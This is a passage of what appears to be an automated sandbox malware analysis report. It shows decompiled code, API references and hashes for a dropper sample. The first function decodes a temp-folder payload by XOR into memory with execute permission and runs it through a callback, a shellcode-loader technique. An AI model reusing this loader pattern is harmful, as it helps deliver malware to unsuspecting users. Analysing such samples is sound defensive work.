                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000e5;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000cb;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000061;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					_t187 = _v8 + 1;
                          					_v8 = _t187;
                          				}
                          				_t149 = _v12;
                          				_t104 = EnumResourceTypesA(0, _t149, 0); // executed
                          				_t106 = (_t104 ^ 0x0000620a) + 0x16054;
                          				if(_t137 + 0xb33a != 0x12f4f) {
                          					_t106 = _t106 + 0x17ef8;
                          					_t187 = _t187 - 1;
                          					_t149 = _t149 + 1;
                          				}
                          				return _t106;
                          			}


























                          0x6f3a1070
                          0x6f3a1079
                          0x6f3a107f
                          0x6f3a1088
                          0x6f3a1091
                          0x6f3a109a
                          0x6f3a10a3
                          0x6f3a10ac
                          0x6f3a10b5
                          0x6f3a10be
                          0x6f3a10c7
                          0x6f3a10cd
                          0x6f3a10dd
                          0x6f3a10ee
                          0x6f3a110f
                          0x6f3a1115
                          0x6f3a1124
                          0x6f3a1134
                          0x6f3a113a
                          0x6f3a1143
                          0x6f3a114f
                          0x6f3a1155
                          0x6f3a1167
                          0x6f3a1185
                          0x6f3a119c
                          0x6f3a11b0
                          0x6f3a11c7
                          0x6f3a11db
                          0x6f3a11ee
                          0x6f3a1201
                          0x6f3a1218
                          0x6f3a122b
                          0x6f3a1242
                          0x6f3a1255
                          0x6f3a1268
                          0x6f3a127f
                          0x6f3a1293
                          0x6f3a12a6
                          0x6f3a1161
                          0x6f3a1164
                          0x6f3a1164
                          0x6f3a12af
                          0x6f3a12b5
                          0x6f3a12c0
                          0x6f3a12d1
                          0x6f3a12d3
                          0x6f3a12d8
                          0x6f3a12d9
                          0x6f3a12d9
                          0x6f3a12fb

                          APIs
                          • GetTempPathW.KERNEL32(00000103,?), ref: 6F3A10DD
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F3A110F
                          • GetFileSize.KERNEL32(?,00000000), ref: 6F3A111E
                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6F3A1134
                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 6F3A114F
                          • EnumResourceTypesA.KERNEL32(00000000,?,00000000), ref: 6F3A12B5
                          Memory Dump Source
                          • Source File: 00000005.00000002.719944705.000000006F3A1000.00000020.00020000.sdmp, Offset: 6F3A0000, based on PE: true
                          • Associated: 00000005.00000002.719937800.000000006F3A0000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719950633.000000006F3A5000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_6f3a0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
                          • String ID:
                          • API String ID: 3718768629-0
                          • Opcode ID: be7e9251c11e9f1769549620f1a829c2108ba45038764865b17aa26c8386d37e
                          • Instruction ID: 75ff16cd27f862e41dfae0e242ac746cb7acd82f5557684f7f61a2250a0d4c3d
                          • Opcode Fuzzy Hash: be7e9251c11e9f1769549620f1a829c2108ba45038764865b17aa26c8386d37e
                          • Instruction Fuzzy Hash: B8913035908148EFDB05CBA8C991BEDBBB2EF5A308F1440D8D641AB392C6766F54DB24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 457 401f51-401f5d 458 401f63-401f79 call 4029e8 * 2 457->458 459 40200b-40200d 457->459 468 401f88-401f96 LoadLibraryExA 458->468 469 401f7b-401f86 GetModuleHandleA 458->469 460 402156-40215b call 401423 459->460 467 40287d-40288c 460->467 472 401f98-401fa6 GetProcAddress 468->472 473 402004-402006 468->473 469->468 469->472 474 401fe5-401fea call 404e23 472->474 475 401fa8-401fae 472->475 473->460 479 401fef-401ff2 474->479 477 401fb0-401fbc call 401423 475->477 478 401fc7-401fdb 475->478 477->479 485 401fbe-401fc5 477->485 486 401fde call 6f3a115e 478->486 487 401fde call 6f3a1070 478->487 479->467 481 401ff8-401fff FreeLibrary 479->481 481->467 483 401fe0-401fe3 483->479 485->479 486->483 487->483
                          C-Code - Quality: 57%
                          			E00401F51(void* __ebx, void* __eflags) {
                          				struct HINSTANCE__* _t18;
                          				struct HINSTANCE__* _t25;
                          				void* _t26;
                          				struct HINSTANCE__* _t29;
                          				CHAR* _t31;
                          				intOrPtr* _t32;
                          				void* _t33;
                          
                          				_t26 = __ebx;
                          				asm("sbb eax, 0x423f58");
                          				 *(_t33 - 4) = 1;
                          				if(__eflags < 0) {
                          					_push(0xffffffe7);
                          					L14:
                          					E00401423();
                          					L15:
                          					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                          					return 0;
                          				}
                          				_t31 = E004029E8(0xfffffff0);
                          				 *(_t33 + 8) = E004029E8(1);
                          				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                          					L3:
                          					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                          					_t29 = _t18;
                          					if(_t29 == _t26) {
                          						_push(0xfffffff6);
                          						goto L14;
                          					}
                          					L4:
                          					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                          					if(_t32 == _t26) {
                          						E00404E23(0xfffffff7,  *(_t33 + 8));
                          					} else {
                          						 *(_t33 - 4) = _t26;
                          						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                          							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                          						} else {
                          							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                          							if( *_t32() != 0) {
                          								 *(_t33 - 4) = 1;
                          							}
                          						}
                          					}
                          					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                          						FreeLibrary(_t29);
                          					}
                          					goto L15;
                          				}
                          				_t25 = GetModuleHandleA(_t31); // executed
                          				_t29 = _t25;
                          				if(_t29 != __ebx) {
                          					goto L4;
                          				}
                          				goto L3;
                          			}










                          0x00401f51
                          0x00401f51
                          0x00401f56
                          0x00401f5d
                          0x0040200b
                          0x00402156
                          0x00402156
                          0x0040287d
                          0x00402880
                          0x0040288c
                          0x0040288c
                          0x00401f6c
                          0x00401f76
                          0x00401f79
                          0x00401f88
                          0x00401f8c
                          0x00401f92
                          0x00401f96
                          0x00402004
                          0x00000000
                          0x00402004
                          0x00401f98
                          0x00401fa2
                          0x00401fa6
                          0x00401fea
                          0x00401fa8
                          0x00401fab
                          0x00401fae
                          0x00401fde
                          0x00401fb0
                          0x00401fb3
                          0x00401fbc
                          0x00401fbe
                          0x00401fbe
                          0x00401fbc
                          0x00401fae
                          0x00401ff2
                          0x00401ff9
                          0x00401ff9
                          0x00000000
                          0x00401ff2
                          0x00401f7c
                          0x00401f82
                          0x00401f86
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID: ?B
                          • API String ID: 2987980305-117478770
                          • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                          • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 488 4015b3-4015c6 call 4029e8 call 40560c 493 4015c8-4015e3 call 4055a3 CreateDirectoryA 488->493 494 40160a-40160d 488->494 502 401600-401608 493->502 503 4015e5-4015f0 GetLastError 493->503 495 40162d-40215b call 401423 494->495 496 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 494->496 510 40287d-40288c 495->510 496->510 502->493 502->494 506 4015f2-4015fb GetFileAttributesA 503->506 507 4015fd 503->507 506->502 506->507 507->502
                          C-Code - Quality: 85%
                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                          				struct _SECURITY_ATTRIBUTES** _t10;
                          				int _t19;
                          				struct _SECURITY_ATTRIBUTES* _t20;
                          				signed char _t22;
                          				struct _SECURITY_ATTRIBUTES* _t23;
                          				CHAR* _t25;
                          				struct _SECURITY_ATTRIBUTES** _t29;
                          				void* _t30;
                          
                          				_t23 = __ebx;
                          				_t25 = E004029E8(0xfffffff0);
                          				_t10 = E0040560C(_t25);
                          				_t27 = _t10;
                          				if(_t10 != __ebx) {
                          					do {
                          						_t29 = E004055A3(_t27, 0x5c);
                          						 *_t29 = _t23;
                          						 *((char*)(_t30 + 0xb)) =  *_t29;
                          						_t19 = CreateDirectoryA(_t25, _t23); // executed
                          						if(_t19 == 0) {
                          							if(GetLastError() != 0xb7) {
                          								L4:
                          								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                          							} else {
                          								_t22 = GetFileAttributesA(_t25); // executed
                          								if((_t22 & 0x00000010) == 0) {
                          									goto L4;
                          								}
                          							}
                          						}
                          						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                          						 *_t29 = _t20;
                          						_t27 =  &(_t29[0]);
                          					} while (_t20 != _t23);
                          				}
                          				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                          					_push(0xfffffff5);
                          					E00401423();
                          				} else {
                          					E00401423(0xffffffe6);
                          					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                          					SetCurrentDirectoryA(_t25); // executed
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                          				return 0;
                          			}











                          0x004015b3
                          0x004015ba
                          0x004015bd
                          0x004015c2
                          0x004015c6
                          0x004015c8
                          0x004015d0
                          0x004015d6
                          0x004015d8
                          0x004015db
                          0x004015e3
                          0x004015f0
                          0x004015fd
                          0x004015fd
                          0x004015f2
                          0x004015f3
                          0x004015fb
                          0x00000000
                          0x00000000
                          0x004015fb
                          0x004015f0
                          0x00401600
                          0x00401603
                          0x00401605
                          0x00401606
                          0x004015c8
                          0x0040160d
                          0x0040162d
                          0x00402156
                          0x0040160f
                          0x00401611
                          0x0040161c
                          0x00401622
                          0x00401622
                          0x00402880
                          0x0040288c

                          APIs
                            • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,73BCF560), ref: 0040561A
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 3751793516-47812868
                          • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                          • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                          • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                          • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 513 40578b-405795 514 405796-4057c0 GetTickCount GetTempFileNameA 513->514 515 4057c2-4057c4 514->515 516 4057cf-4057d1 514->516 515->514 517 4057c6 515->517 518 4057c9-4057cc 516->518 517->518
                          C-Code - Quality: 100%
                          			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                          				signed int _t11;
                          				int _t14;
                          				signed int _t16;
                          				void* _t19;
                          				CHAR* _t20;
                          
                          				_t20 = _a4;
                          				_t19 = 0x64;
                          				while(1) {
                          					_t19 = _t19 - 1;
                          					_a4 = 0x61736e;
                          					_t11 = GetTickCount();
                          					_t16 = 0x1a;
                          					_a6 = _a6 + _t11 % _t16;
                          					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                          					if(_t14 != 0) {
                          						break;
                          					}
                          					if(_t19 != 0) {
                          						continue;
                          					}
                          					 *_t20 =  *_t20 & 0x00000000;
                          					return _t14;
                          				}
                          				return _t20;
                          			}








                          0x0040578f
                          0x00405795
                          0x00405796
                          0x00405796
                          0x00405797
                          0x0040579e
                          0x004057a8
                          0x004057b5
                          0x004057b8
                          0x004057c0
                          0x00000000
                          0x00000000
                          0x004057c4
                          0x00000000
                          0x00000000
                          0x004057c6
                          0x00000000
                          0x004057c6
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32 ref: 0040579E
                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-289564233
                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 602 401389-40138e 603 4013fa-4013fc 602->603 604 401390-4013a0 603->604 605 4013fe 603->605 604->605 606 4013a2-4013a3 call 401434 604->606 607 401400-401401 605->607 609 4013a8-4013ad 606->609 610 401404-401409 609->610 611 4013af-4013b7 call 40136d 609->611 610->607 614 4013b9-4013bb 611->614 615 4013bd-4013c2 611->615 616 4013c4-4013c9 614->616 615->616 616->603 617 4013cb-4013f4 MulDiv SendMessageA 616->617 617->603
                          C-Code - Quality: 69%
                          			E00401389(signed int _a4) {
                          				intOrPtr* _t6;
                          				void* _t8;
                          				void* _t10;
                          				signed int _t11;
                          				void* _t12;
                          				intOrPtr _t15;
                          				signed int _t16;
                          				signed int _t17;
                          				void* _t18;
                          
                          				_t17 = _a4;
                          				while(_t17 >= 0) {
                          					_t15 =  *0x423ed0; // 0x754434
                          					_t6 = _t17 * 0x1c + _t15;
                          					if( *_t6 == 1) {
                          						break;
                          					}
                          					_push(_t6); // executed
                          					_t8 = E00401434(); // executed
                          					if(_t8 == 0x7fffffff) {
                          						return 0x7fffffff;
                          					}
                          					_t10 = E0040136D(_t8);
                          					if(_t10 != 0) {
                          						_t11 = _t10 - 1;
                          						_t16 = _t17;
                          						_t17 = _t11;
                          						_t12 = _t11 - _t16;
                          					} else {
                          						_t12 = _t10 + 1;
                          						_t17 = _t17 + 1;
                          					}
                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                          						 *0x42368c =  *0x42368c + _t12;
                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                          					}
                          				}
                          				return 0;
                          			}












                          0x0040138a
                          0x004013fa
                          0x00401392
                          0x0040139b
                          0x004013a0
                          0x00000000
                          0x00000000
                          0x004013a2
                          0x004013a3
                          0x004013ad
                          0x00000000
                          0x00401404
                          0x004013b0
                          0x004013b7
                          0x004013bd
                          0x004013be
                          0x004013c0
                          0x004013c2
                          0x004013b9
                          0x004013b9
                          0x004013ba
                          0x004013ba
                          0x004013c9
                          0x004013cb
                          0x004013f4
                          0x004013f4
                          0x004013c9
                          0x00000000

                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageA.USER32 ref: 004013F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: 4Du
                          • API String ID: 3850602802-1750703084
                          • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                          • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 84%
                          			E004031F1(void* __eflags) {
                          				void* _t2;
                          				void* _t5;
                          				CHAR* _t6;
                          
                          				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                          				E00405CE3(_t6);
                          				_t2 = E004055E5(_t6);
                          				if(_t2 != 0) {
                          					E00405578(_t6);
                          					CreateDirectoryA(_t6, 0); // executed
                          					_t5 = E0040578B("1033", _t6); // executed
                          					return _t5;
                          				} else {
                          					return _t2;
                          				}
                          			}






                          0x004031f2
                          0x004031f8
                          0x004031fe
                          0x00403205
                          0x0040320a
                          0x00403212
                          0x0040321e
                          0x00403224
                          0x00403208
                          0x00403208
                          0x00403208

                          APIs
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 4115351271-517883005
                          • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                          • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 99%
                          			E00406481() {
                          				signed int _t530;
                          				void _t537;
                          				signed int _t538;
                          				signed int _t539;
                          				unsigned short _t569;
                          				signed int _t579;
                          				signed int _t607;
                          				void* _t627;
                          				signed int _t628;
                          				signed int _t635;
                          				signed int* _t643;
                          				void* _t644;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					_t530 =  *(_t644 - 0x30);
                          					if(_t530 >= 4) {
                          					}
                          					 *(_t644 - 0x40) = 6;
                          					 *(_t644 - 0x7c) = 0x19;
                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                          					while(1) {
                          						L145:
                          						 *(_t644 - 0x50) = 1;
                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          						while(1) {
                          							L149:
                          							if( *(_t644 - 0x48) <= 0) {
                          								goto L155;
                          							}
                          							L150:
                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                          							 *(_t644 - 0x54) = _t643;
                          							_t569 =  *_t643;
                          							_t635 = _t569 & 0x0000ffff;
                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                          							if( *(_t644 - 0xc) >= _t607) {
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                          								_t628 = _t627 + 1;
                          								 *_t643 = _t569 - (_t569 >> 5);
                          								 *(_t644 - 0x50) = _t628;
                          							} else {
                          								 *(_t644 - 0x10) = _t607;
                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                          							}
                          							if( *(_t644 - 0x10) >= 0x1000000) {
                          								L148:
                          								_t487 = _t644 - 0x48;
                          								 *_t487 =  *(_t644 - 0x48) - 1;
                          								L149:
                          								if( *(_t644 - 0x48) <= 0) {
                          									goto L155;
                          								}
                          								goto L150;
                          							} else {
                          								L154:
                          								L146:
                          								if( *(_t644 - 0x6c) == 0) {
                          									L169:
                          									 *(_t644 - 0x88) = 0x18;
                          									L170:
                          									_t579 = 0x22;
                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                          									_t539 = 0;
                          									L172:
                          									return _t539;
                          								}
                          								L147:
                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          								_t484 = _t644 - 0x70;
                          								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          								goto L148;
                          							}
                          							L155:
                          							_t537 =  *(_t644 - 0x7c);
                          							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                          							while(1) {
                          								L140:
                          								 *(_t644 - 0x88) = _t537;
                          								while(1) {
                          									L1:
                          									_t538 =  *(_t644 - 0x88);
                          									if(_t538 > 0x1c) {
                          										break;
                          									}
                          									L2:
                          									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                          										case 0:
                          											L3:
                          											if( *(_t644 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											L4:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t538 =  *( *(_t644 - 0x70));
                          											if(_t538 > 0xe1) {
                          												goto L171;
                          											}
                          											L5:
                          											_t542 = _t538 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t581);
                          											_push(9);
                          											_pop(_t582);
                          											_t638 = _t542 / _t581;
                          											_t544 = _t542 % _t581 & 0x000000ff;
                          											asm("cdq");
                          											_t633 = _t544 % _t582 & 0x000000ff;
                          											 *(_t644 - 0x3c) = _t633;
                          											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                          											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                          											_t641 = (0x300 << _t633 + _t638) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                          												L10:
                          												if(_t641 == 0) {
                          													L12:
                          													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
